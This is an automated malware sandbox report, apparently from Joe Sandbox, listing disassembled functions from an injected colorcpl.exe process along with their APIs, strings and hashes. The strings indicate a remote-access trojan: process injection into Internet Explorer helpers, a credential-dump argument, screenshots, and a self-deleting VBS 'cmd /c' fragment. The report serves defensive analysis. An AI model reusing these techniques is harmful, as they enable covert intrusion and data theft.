                                                                                                                              • Opcode Fuzzy Hash: 7e31a1b9496086b86598ee154c2d6726d767bb8b3f03f579ec5e5891024cf6dd
                                                                                                                              • Instruction Fuzzy Hash: 98B18E716083409BE714FB34C890AAFB7E5EF95258F40491DF48A87290FF71B949CB8A
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 046B0600 Relevance: 18.4, APIs: 12, Instructions: 376COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: _free
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 269201875-0
                                                                                                                              • Opcode ID: 34f343037eecc5b4c673723cb4393a7244358f04db57be8e8a3980ae0a17dbbb
                                                                                                                              • Instruction ID: 11627d318e92f0ff40c3b7a7b59b346af0479c48a42d2b367df3ffd0efabd570
                                                                                                                              • Opcode Fuzzy Hash: 34f343037eecc5b4c673723cb4393a7244358f04db57be8e8a3980ae0a17dbbb
                                                                                                                              • Instruction Fuzzy Hash: 55C12571E40204AFEB20DBA8CC85FDE77F8AB59704F144155FA85FB291F570AD818BA4
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0673130C Relevance: 18.4, APIs: 12, Instructions: 376COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443972597.00000000066E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 066E0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_66e0000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: _free
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 269201875-0
                                                                                                                              • Opcode ID: 47079874d6611f76b22abc1c1892e8562d414d23f3395fd45a7677fdf32a9ec5
                                                                                                                              • Instruction ID: cb712ad21fa19105c7fd0d60745915ae583a0c7e39d5ada6272c1a9a3b246a6a
                                                                                                                              • Opcode Fuzzy Hash: 47079874d6611f76b22abc1c1892e8562d414d23f3395fd45a7677fdf32a9ec5
                                                                                                                              • Instruction Fuzzy Hash: 95C19772D00258FFDBA0DBA8CC45FEE77F8AB08750F544169FA14EF282D674994087A0
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 04664E26 Relevance: 18.1, APIs: 12, Instructions: 65synchronizationCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • WaitForSingleObject.KERNEL32(?,000000FF,00000000,046D4EF8,?,00000000,046D4EF8,04664CA8,00000000,?,?,?,046D4EF8,0466530B), ref: 04664E38
                                                                                                                              • SetEvent.KERNEL32(?,?,00000000,046D4EF8,04664CA8,00000000,?,?,?,046D4EF8,0466530B), ref: 04664E43
                                                                                                                              • CloseHandle.KERNEL32(?,?,00000000,046D4EF8,04664CA8,00000000,?,?,?,046D4EF8,0466530B), ref: 04664E4C
                                                                                                                              • closesocket.WS2_32(?), ref: 04664E5A
                                                                                                                              • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,046D4EF8,04664CA8,00000000,?,?,?,046D4EF8,0466530B), ref: 04664E91
                                                                                                                              • SetEvent.KERNEL32(?,?,00000000,046D4EF8,04664CA8,00000000,?,?,?,046D4EF8,0466530B), ref: 04664EA2
                                                                                                                              • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,046D4EF8,04664CA8,00000000,?,?,?,046D4EF8,0466530B), ref: 04664EA9
                                                                                                                              • SetEvent.KERNEL32(?,?,00000000,046D4EF8,04664CA8,00000000,?,?,?,046D4EF8,0466530B), ref: 04664EBA
                                                                                                                              • CloseHandle.KERNEL32(?,?,00000000,046D4EF8,04664CA8,00000000,?,?,?,046D4EF8,0466530B), ref: 04664EBF
                                                                                                                              • CloseHandle.KERNEL32(?,?,00000000,046D4EF8,04664CA8,00000000,?,?,?,046D4EF8,0466530B), ref: 04664EC4
                                                                                                                              • SetEvent.KERNEL32(?,?,00000000,046D4EF8,04664CA8,00000000,?,?,?,046D4EF8,0466530B), ref: 04664ED1
                                                                                                                              • CloseHandle.KERNEL32(?,?,00000000,046D4EF8,04664CA8,00000000,?,?,?,046D4EF8,0466530B), ref: 04664ED6
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: CloseEventHandle$ObjectSingleWait$closesocket
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3658366068-0
                                                                                                                              • Opcode ID: 42bc2b70dbecd344f4a4093068534f2d7e5742b36a90f68789dbcab0d31eb04e
                                                                                                                              • Instruction ID: 67f5e469fe2499bbbe2a710d12b4a8d8279f932926883199846dbcb249da7341
                                                                                                                              • Opcode Fuzzy Hash: 42bc2b70dbecd344f4a4093068534f2d7e5742b36a90f68789dbcab0d31eb04e
                                                                                                                              • Instruction Fuzzy Hash: B4213871010B00AFDB216B22DC49B26BBA1FF40326F204A1CE2E311AF0DB75B855DB58
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 04672AB4 Relevance: 18.0, APIs: 9, Strings: 1, Instructions: 482sleepfileCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 04672ACD
                                                                                                                                • Part of subcall function 0467B978: GetCurrentProcessId.KERNEL32(00000000,75923530,00000000,?,?,?,?,046C6468,0466D20D,.vbs,?,?,?,?,?,046D52F0), ref: 0467B99F
                                                                                                                                • Part of subcall function 04678568: CloseHandle.KERNEL32(046640F5,?,?,046640F5,046C5E74), ref: 0467857E
                                                                                                                                • Part of subcall function 04678568: CloseHandle.KERNEL32(046C5E74,?,?,046640F5,046C5E74), ref: 04678587
                                                                                                                              • Sleep.KERNEL32(0000000A,046C5E74), ref: 04672C1F
                                                                                                                              • Sleep.KERNEL32(0000000A,046C5E74,046C5E74), ref: 04672CC1
                                                                                                                              • Sleep.KERNEL32(0000000A,046C5E74,046C5E74,046C5E74), ref: 04672D63
                                                                                                                              • DeleteFileW.KERNEL32(00000000,046C5E74,046C5E74,046C5E74), ref: 04672DC5
                                                                                                                              • DeleteFileW.KERNEL32(00000000,046C5E74,046C5E74,046C5E74), ref: 04672DFC
                                                                                                                              • DeleteFileW.KERNEL32(00000000,046C5E74,046C5E74,046C5E74), ref: 04672E38
                                                                                                                              • Sleep.KERNEL32(000001F4,046C5E74,046C5E74,046C5E74), ref: 04672E52
                                                                                                                              • Sleep.KERNEL32(00000064), ref: 04672E94
                                                                                                                                • Part of subcall function 04664AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 04664B36
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Sleep$File$Delete$CloseHandle$CurrentModuleNameProcesssend
                                                                                                                              • String ID: /stext "
                                                                                                                              • API String ID: 1223786279-3856184850
                                                                                                                              • Opcode ID: 8ff618a9c4aa5bdb95b197c19045d88668794a27acb7fa8c15e959f21a9c35f3
                                                                                                                              • Instruction ID: 2b05da5544c5aeaaab3c47feb76eb2aebf57e1beb1d839b1e104cf17bd2f47e0
                                                                                                                              • Opcode Fuzzy Hash: 8ff618a9c4aa5bdb95b197c19045d88668794a27acb7fa8c15e959f21a9c35f3
                                                                                                                              • Instruction Fuzzy Hash: 120213315083419BE328FB60D8A0AEFB3E5AF95309F50495DE48B47194FF707A4AC69A
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0466F474 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 210processCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,046D50E4,?,046D5338), ref: 0466F48E
                                                                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0466F4B9
                                                                                                                              • Process32FirstW.KERNEL32(00000000,0000022C), ref: 0466F4D5
                                                                                                                              • Process32NextW.KERNEL32(00000000,0000022C), ref: 0466F554
                                                                                                                              • CloseHandle.KERNEL32(00000000,?,00000000,?,?,046D5338), ref: 0466F563
                                                                                                                                • Part of subcall function 0467C1DD: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0467C1F5
                                                                                                                                • Part of subcall function 0467C1DD: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0467C208
                                                                                                                              • CloseHandle.KERNEL32(00000000,?,046D5338), ref: 0466F66E
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: CloseHandleOpenProcessProcess32$CreateFileFirstModuleNameNextSnapshotToolhelp32
                                                                                                                              • String ID: C:\Program Files(x86)\Internet Explorer\$Inj$ieinstal.exe$ielowutil.exe
                                                                                                                              • API String ID: 3756808967-1743721670
                                                                                                                              • Opcode ID: c6f83b8b556533d1c70090d217fdeaf5306c8dc8c5192ef1b673ed4f0949704f
                                                                                                                              • Instruction ID: b475406b3ef65d31f6b7f324dcf49b8004416e33b8ce78bf012425fefac06332
                                                                                                                              • Opcode Fuzzy Hash: c6f83b8b556533d1c70090d217fdeaf5306c8dc8c5192ef1b673ed4f0949704f
                                                                                                                              • Instruction Fuzzy Hash: 63713F705083419BE714FF20E8A09EEB7E5AFA5649F40482DE587431A1FF34B94DCB9A
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 04674BB0 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 158COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: 65535$udp
                                                                                                                              • API String ID: 0-1267037602
                                                                                                                              • Opcode ID: f30e0d579142656752f5762ed14515b46517ac987ed2be9058ccafb2e1701ecc
                                                                                                                              • Instruction ID: 7b4da59aaeef4b412dbe63d41a15dc85e6cb45ee68764b2615b5bd717914a696
                                                                                                                              • Opcode Fuzzy Hash: f30e0d579142656752f5762ed14515b46517ac987ed2be9058ccafb2e1701ecc
                                                                                                                              • Instruction Fuzzy Hash: 1A51D3B5609301AFE7219A68C90CB3A77E8EF94750F08892EF8C597390FF65F8408652
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0466D7FF Relevance: 17.6, APIs: 3, Strings: 7, Instructions: 148COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 04672850: TerminateProcess.KERNEL32(00000000,pth_unenc,0466F8C8), ref: 04672860
                                                                                                                                • Part of subcall function 04672850: WaitForSingleObject.KERNEL32(000000FF), ref: 04672873
                                                                                                                                • Part of subcall function 046736F8: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000,046D52F0), ref: 04673714
                                                                                                                                • Part of subcall function 046736F8: RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000208,?), ref: 0467372D
                                                                                                                                • Part of subcall function 046736F8: RegCloseKey.KERNEL32(00000000), ref: 04673738
                                                                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0466D859
                                                                                                                              • ShellExecuteW.SHELL32(00000000,open,00000000,Function_00066468,Function_00066468,00000000), ref: 0466D9B8
                                                                                                                              • ExitProcess.KERNEL32 ref: 0466D9C4
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
                                                                                                                              • String ID: """, 0$.vbs$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$Temp$exepath$open
                                                                                                                              • API String ID: 1913171305-2411266221
                                                                                                                              • Opcode ID: ca2025de691e490bce0b9b52a1c6acd2e1274bbe791180fca867410241c1b3a4
                                                                                                                              • Instruction ID: 31c46514fd748ebcede2f35a270da25418e6ebfb759127b0bd0b6b1271212729
                                                                                                                              • Opcode Fuzzy Hash: ca2025de691e490bce0b9b52a1c6acd2e1274bbe791180fca867410241c1b3a4
                                                                                                                              • Instruction Fuzzy Hash: 864131319101186BEB14FBA4DC64DFEB7B9AF61609F00016DE407A3190FF307E8ACA98
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0469A83A Relevance: 16.6, APIs: 11, Instructions: 116COMMONLIBRARYCODE
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,04661D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0469A892
                                                                                                                              • GetLastError.KERNEL32(?,?,04661D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0469A89F
                                                                                                                              • __dosmaperr.LIBCMT ref: 0469A8A6
                                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,04661D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0469A8D2
                                                                                                                              • GetLastError.KERNEL32(?,?,?,04661D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0469A8DC
                                                                                                                              • __dosmaperr.LIBCMT ref: 0469A8E3
                                                                                                                              • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,04661D55,?), ref: 0469A926
                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,04661D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0469A930
                                                                                                                              • __dosmaperr.LIBCMT ref: 0469A937
                                                                                                                              • _free.LIBCMT ref: 0469A943
                                                                                                                              • _free.LIBCMT ref: 0469A94A
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2441525078-0
                                                                                                                              • Opcode ID: eef4469f9c2bbdb73f8fdb2aa0378b581ce4822de4ea6d798b2a064978f8c0e1
                                                                                                                              • Instruction ID: 1a472c6e7ac630bdd6836a01ae63ef2c9088d53ecc028b068a2908b192dafa43
                                                                                                                              • Opcode Fuzzy Hash: eef4469f9c2bbdb73f8fdb2aa0378b581ce4822de4ea6d798b2a064978f8c0e1
                                                                                                                              • Instruction Fuzzy Hash: AE31A07190428AABDF11AFE4CC449AE7BECFF01368B140219F920562A0FB30ED51DBA0
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 046654A0 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 155windowmemoryCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • SetEvent.KERNEL32(?,?), ref: 046654BF
                                                                                                                              • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0466556F
                                                                                                                              • TranslateMessage.USER32(?), ref: 0466557E
                                                                                                                              • DispatchMessageA.USER32(?), ref: 04665589
                                                                                                                              • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,046D4F78), ref: 04665641
                                                                                                                              • HeapFree.KERNEL32(00000000,00000000,0000003B,0000003B,?,00000000), ref: 04665679
                                                                                                                                • Part of subcall function 04664AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 04664B36
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
                                                                                                                              • String ID: CloseChat$DisplayMessage$GetMessage
                                                                                                                              • API String ID: 2956720200-749203953
                                                                                                                              • Opcode ID: 307c18906ff478f6870dfeb6081551c927e46615278092d5e5868d331fc606d7
                                                                                                                              • Instruction ID: 1550c2340ed907c8a2f4c915cd7e69f6c8eeff5dcd252ac0dd7b482532ae6bc6
                                                                                                                              • Opcode Fuzzy Hash: 307c18906ff478f6870dfeb6081551c927e46615278092d5e5868d331fc606d7
                                                                                                                              • Instruction Fuzzy Hash: 0B418071A042016BDB14FB74D8598AF77A9EF86608F40091DE55397290FF38AD09C79A
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 046732D2 Relevance: 15.2, APIs: 10, Instructions: 153fileCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • CreateFileMappingW.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 04673417
                                                                                                                              • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 04673425
                                                                                                                              • GetFileSize.KERNEL32(?,00000000), ref: 04673432
                                                                                                                              • UnmapViewOfFile.KERNEL32(00000000), ref: 04673452
                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0467345F
                                                                                                                              • CloseHandle.KERNEL32(?), ref: 04673465
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: File$CloseHandleView$CreateMappingSizeUnmap
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 297527592-0
                                                                                                                              • Opcode ID: 5251236038bb0e793c190d59141b0672fdaa19dafad74d5d8b89602c6c93f377
                                                                                                                              • Instruction ID: db69dd0f2691410955f900217f732742d43efcc65ae30dda7a6fb244505737f5
                                                                                                                              • Opcode Fuzzy Hash: 5251236038bb0e793c190d59141b0672fdaa19dafad74d5d8b89602c6c93f377
                                                                                                                              • Instruction Fuzzy Hash: 9C41E171608341BBE7209B25EC49F2B3AACEF85728F14091DFA44D6290FE74E984DA65
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0467AB0D Relevance: 15.1, APIs: 10, Instructions: 66serviceCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,00000001,?,?,?,?,?,?,0467A486,00000000), ref: 0467AB1C
                                                                                                                              • OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,0467A486,00000000), ref: 0467AB33
                                                                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0467A486,00000000), ref: 0467AB40
                                                                                                                              • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0467A486,00000000), ref: 0467AB4F
                                                                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0467A486,00000000), ref: 0467AB60
                                                                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0467A486,00000000), ref: 0467AB63
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Service$CloseHandle$Open$ControlManager
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 221034970-0
                                                                                                                              • Opcode ID: 427710443f46b1b23aa5c1a709b124c66324e2f1862d94c23127d896c5b12d2d
                                                                                                                              • Instruction ID: 2678f0b7d509784b9d80eaa437934f7ade655a36faa0ab39058cb3aa2571971b
                                                                                                                              • Opcode Fuzzy Hash: 427710443f46b1b23aa5c1a709b124c66324e2f1862d94c23127d896c5b12d2d
                                                                                                                              • Instruction Fuzzy Hash: CF11E1B1940528AFD721ABB4DC88CFF3B6CDB57765B00001DFA0692140FB385D8AAAF1
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 046A8121 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • _free.LIBCMT ref: 046A8135
                                                                                                                                • Part of subcall function 046A6782: RtlFreeHeap.NTDLL(00000000,00000000,?,046B0C6F,0000000A,00000000,0000000A,00000000,?,046B0F13,0000000A,00000007,0000000A,?,046B145E,0000000A), ref: 046A6798
                                                                                                                                • Part of subcall function 046A6782: GetLastError.KERNEL32(0000000A,?,046B0C6F,0000000A,00000000,0000000A,00000000,?,046B0F13,0000000A,00000007,0000000A,?,046B145E,0000000A,0000000A), ref: 046A67AA
                                                                                                                              • _free.LIBCMT ref: 046A8141
                                                                                                                              • _free.LIBCMT ref: 046A814C
                                                                                                                              • _free.LIBCMT ref: 046A8157
                                                                                                                              • _free.LIBCMT ref: 046A8162
                                                                                                                              • _free.LIBCMT ref: 046A816D
                                                                                                                              • _free.LIBCMT ref: 046A8178
                                                                                                                              • _free.LIBCMT ref: 046A8183
                                                                                                                              • _free.LIBCMT ref: 046A818E
                                                                                                                              • _free.LIBCMT ref: 046A819C
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 776569668-0
                                                                                                                              • Opcode ID: c5c6d9669102feed0b9487f29e3142e51a8aa1f88ba3258d2a5bdae0679364da
                                                                                                                              • Instruction ID: da61cf1a87cc8da7e180f1d4627fca21229f5c5db4c7dab6ede9e06d324502f1
                                                                                                                              • Opcode Fuzzy Hash: c5c6d9669102feed0b9487f29e3142e51a8aa1f88ba3258d2a5bdae0679364da
                                                                                                                              • Instruction Fuzzy Hash: 8711A47A110508AFEB01EF54C841DD97BA5FF14259B0540A9BA988F231EA31EFA09FC4
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 06728E2D Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443972597.00000000066E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 066E0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_66e0000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: _free
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 269201875-0
                                                                                                                              • Opcode ID: 27d76b13a5ecae076ca6598a5b1433465caaf67949f0bdc0fbde8a5d49186781
                                                                                                                              • Instruction ID: 1a3877c419d36ed8cccf6c3d99666329893caae458ee030b945dc4ee3e058dcb
                                                                                                                              • Opcode Fuzzy Hash: 27d76b13a5ecae076ca6598a5b1433465caaf67949f0bdc0fbde8a5d49186781
                                                                                                                              • Instruction Fuzzy Hash: E611B67650012DBFCB95EF94CD44CD93FA5EF08250F2541A1BA188F621DA32DA549B81
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 066E63A6 Relevance: 14.3, APIs: 2, Strings: 6, Instructions: 278COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • __Init_thread_footer.LIBCMT ref: 066E63F2
                                                                                                                              • __Init_thread_footer.LIBCMT ref: 066E642F
                                                                                                                                • Part of subcall function 0671547C: __onexit.LIBCMT ref: 06715482
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443972597.00000000066E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 066E0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_66e0000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Init_thread_footer$__onexit
                                                                                                                              • String ID: 0lG$0lG$0lG$0lG$0lG$kG
                                                                                                                              • API String ID: 1878262506-4252883706
                                                                                                                              • Opcode ID: 17955cd63720edcbfcfcd3820b33dd0003a4590f15552dc644d35ad82fd962e8
                                                                                                                              • Instruction ID: 84e744df8c8a076298c5b74b506dd32b90314368e1436db79f51a31414210b5a
                                                                                                                              • Opcode Fuzzy Hash: 17955cd63720edcbfcfcd3820b33dd0003a4590f15552dc644d35ad82fd962e8
                                                                                                                              • Instruction Fuzzy Hash: F0913571601204AFD7D5FF38ED50A6E3BAEEB40700F01443EF999962A1DF259D488B6E
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 04679FB4 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 176sleeptimeCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • __EH_prolog.LIBCMT ref: 04679FB9
                                                                                                                              • GdiplusStartup.GDIPLUS(046D4ACC,?,00000000), ref: 04679FEB
                                                                                                                              • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 0467A077
                                                                                                                              • Sleep.KERNEL32(000003E8), ref: 0467A0FD
                                                                                                                              • GetLocalTime.KERNEL32(?), ref: 0467A105
                                                                                                                              • Sleep.KERNEL32(00000000,00000018,00000000), ref: 0467A1F4
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Sleep$CreateDirectoryGdiplusH_prologLocalStartupTime
                                                                                                                              • String ID: time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i
                                                                                                                              • API String ID: 489098229-3790400642
                                                                                                                              • Opcode ID: bfdae5ed18338c5b2a2aeb4c58b5e888f11a5b2281d0e4ed9f5f0a7e9b42d9bb
                                                                                                                              • Instruction ID: 874fd0039d9e7ba756bd5f99daa911a74ffb8e3eff3bd9fd179fab87763b7855
                                                                                                                              • Opcode Fuzzy Hash: bfdae5ed18338c5b2a2aeb4c58b5e888f11a5b2281d0e4ed9f5f0a7e9b42d9bb
                                                                                                                              • Instruction Fuzzy Hash: B6516F70E002589AFB14FBB4DC649FDBBA9AF55219F44001DE506A7290FF38BD49CB98
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 046B5F04 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 154COMMONLIBRARYCODE
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,046B6FFF), ref: 046B5F27
                                                                                                                              Strings
